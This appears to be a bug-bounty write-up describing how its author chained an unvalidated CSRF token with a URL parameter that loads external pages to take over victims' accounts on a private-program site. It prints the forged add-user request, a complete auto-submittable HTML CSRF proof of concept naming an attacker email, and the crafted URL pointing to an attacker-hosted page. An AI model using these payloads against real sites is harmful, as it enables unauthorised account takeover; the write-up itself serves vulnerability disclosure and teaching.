Cross Site Request Forgery Critical Exploitable IN Infected Site?
Hello again
In One Private Program In Hackerone
Have Found Cross Site Request Forgery Vulnerability But not the usual
I Have Turn IT Critical CSRF Mixed With
HTTP PARRAMETER PULLUTION
Lets TO Write How It?🤔
In this request To Add Another User To Account To Obtain Permission to Access The victim’s Account
POST /users/settings/ HTTP/1.1
Host: evilwite.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 239
Connection: close
Upgrade-Insecure-Requests: 1ThisAction=AddUser&NextAction=Insert&new_user_email=attackeremail%40evil.com&first_name=mesbah&last_name=mesbah&phone=01032764848&csrf_token=PdsLuVDyQUbQZjbnl4R70oGTUIyKJfl7dHXW0j0jd4H7tAJR%2Fe%2F2P7%2B6akjtBH7thiGbmGhidK29eDguPn2dYg%3D%3D
Okay What’s the problem here The CSRF Token Its Without Any Validation
User is now added
Okay Its Was Easily CSRF What Now Create A
CSRF PoC Sure
<html>
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=”https://x.website.infected/settings/users" method=”POST”>
<input type=”hidden” name=”ThisAction” value=”AddUser” />
<input type=”hidden” name=”NextAction” value=”Insert” />
<input type=”hidden” name=”new_user_email” value=”attackeremail@evil.com” />
<input type=”hidden” name=”first_name” value=”mesbah” />
<input type=”hidden” name=”last_name” value=”mesbah” />
<input type=”hidden” name=”phone” value=”01032764848" />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
But After Search In Proxy Http History Accidentally
I Found Parrameter Named URL In Site When I put anything, it is printed in the Response
Of course Test Cross Site Scripting But it didn’t work
It took me to think for a few minutes
I found that when I put another website in this parameter Example Of This Parrameter
https://x.website.infected/public/repositry?url=https://y.website.infected/
Okay Please Think With Me Now
I Get A Free Hosting Site And Upload File To Him
Now we will change the parameter from The Website Original To My 000webhost Website
https://x.website.infected/public/repositry?url=http://5000mesbah.000webhost.com/csrf.html
Oh My God Its Worked At Website
What’s useful about that
Step 2 I Addedd JS Code With
window.onload Function To Submit Request
Now Its Full Account Takeover
By the infected site, not by the attacker
🤩🤩🤩🤩
Its More Good
And Wait For New WRITEUP By Me
vulnerability Reported
vulnerability Triagged
vulnerability :The site has not yet been paid😞😞😞😞
Good Bye
❤